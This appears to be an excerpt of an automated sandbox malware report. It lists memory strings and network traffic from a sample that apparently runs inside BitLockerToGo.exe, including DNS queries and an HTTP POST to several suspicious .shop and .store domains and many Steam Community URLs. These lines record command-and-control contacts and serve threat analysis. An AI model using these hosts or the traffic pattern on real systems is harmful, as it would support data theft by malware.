              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policydefault-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=Nonesessionid=2b82286952de39ddee451a4d; Path=/; Secure; SameSite=NoneSet-CookienginxServerRetry-AfterProxy-SupportProxy-AuthenticateP3PLocationETagAuthentication-InfoAgeAccept-RangesLast-ModifiedMon, 26 Jul 1997 05:00:00 GMTExpiresContent-RangeContent-MD5Content-LocationContent-LanguageContent-Encodingtext/html; charset=UTF-8Content-Type34837Content-LengthAllowWarningViaUpgradeTransfer-EncodingTrailerPragmaKeep-AliveWed, 02 Oct 2024 13:01:26 GMTDateProxy-ConnectioncloseConnectionno-cacheCache-Control equals www.youtube.com (Youtube)
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq.cn https://steambroadcastchat.akamaized.net http://127.0.0.1:27060 ws://127.0.0.1:27060; frame-src 'self' steam: https://store.steampowered.com/ https://help.steampowered.com/ https://login.steampowered.com/ https://www.youtube.com https://www.google.com https://sketchfab.com https://player.vimeo.com https://medal.tv https://www.google.com/recaptcha/ https://recaptcha.net/recaptcha/; frame-ancestors 'self' https://store.steampowered.com/; equals www.youtube.com (Youtube)
              Source: global trafficDNS traffic detected: DNS query: dividenntykw.shop
              Source: global trafficDNS traffic detected: DNS query: racedsuitreow.shop
              Source: global trafficDNS traffic detected: DNS query: defenddsouneuw.shop
              Source: global trafficDNS traffic detected: DNS query: deallyharvenw.shop
              Source: global trafficDNS traffic detected: DNS query: priooozekw.shop
              Source: global trafficDNS traffic detected: DNS query: pumpkinkwquo.shop
              Source: global trafficDNS traffic detected: DNS query: abortinoiwiam.shop
              Source: global trafficDNS traffic detected: DNS query: surroundeocw.shop
              Source: global trafficDNS traffic detected: DNS query: covvercilverow.shop
              Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
              Source: global trafficDNS traffic detected: DNS query: gravvitywio.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: dividenntykw.shop
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:27060
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://cevcsca2021.crl.certum.pl/cevcsca2021.crl0w
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://cevcsca2021.ocsp-certum.com07
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://ocsp2.globalsign.com/rootr606
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://repository.certum.pl/cevcsca2021.cer0
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://repository.certum.pl/ctnca2.cer09
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
              Source: BitLockerToGo.exe, 00000004.00000002.2041942999.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765638924.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
              Source: BitLockerToGo.exe, 00000004.00000002.2041942999.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765638924.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/privacy_agreement/
              Source: BitLockerToGo.exe, 00000004.00000002.2041942999.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765638924.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://store.steampowered.com/subscriber_agreement/
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://subca.ocsp-certum.com02
              Source: 7wN7BF7WfX.exeString found in binary or memory: http://www.certum.pl/CPS0
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.valvesoftware.com/legal.htm
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic
              Source: BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://broadcast.st.dl.eccdnx.com
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=Ev2sBLgkgyWJ&a
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.VpiwkLAYt9r1
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
              Source: BitLockerToGo.exe, 00000004.00000002.2041942999.0000000002CAC000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765638924.0000000002CAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=8vRVyaZK
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C06000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=w4s3
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=9OzcxMXbaV84&l=english
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=f2hMA1v9Zkc8&l=engl
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=f3vWO7swdDqp&l=english
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=pvBDaFhF2LLJ&l=e
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
              Source: BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=ezWS9te9Zwm9&l=en
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/auth_refresh.js?v=WgUxSlKTb3W1&amp
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C93000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
              Source: BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covvercilverow.shop/
              Source: BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covvercilverow.shop/api
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://covvercilverow.shop/t
              Source: BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deallyharvenw.shop/api
              Source: BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C3F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1753315845.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://defenddsouneuw.shop/pi3
              Source: BitLockerToGo.exe, 00000004.00000002.2041483138.0000000002C02000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765698684.0000000002C02000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dividenntykw.shop/Y
              Source: BitLockerToGo.exe, 00000004.00000002.2041483138.0000000002BFB000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765698684.0000000002BFB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dividenntykw.shop/api
              Source: 7wN7BF7WfX.exeString found in binary or memory: https://github.com/golang/protobuf/issues/1609):
              Source: BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/
              Source: BitLockerToGo.exe, 00000004.00000003.1765698684.0000000002C0C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041744613.0000000002C0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/api
              Source: BitLockerToGo.exe, 00000004.00000003.1765698684.0000000002C0C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041744613.0000000002C0C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/e
              Source: BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C2D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C2D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store/~7
              Source: BitLockerToGo.exe, 00000004.00000002.2041862232.0000000002C24000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765923337.0000000002C21000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1766159958.0000000002C23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gravvitywio.store:443/api
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
              Source: BitLockerToGo.exe, 00000004.00000003.1753285132.0000000002C9A000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.1765558076.0000000002CA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
              Source: BitLockerToGo.exe, 00000004.00000003.1753398287.0000000002C88000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
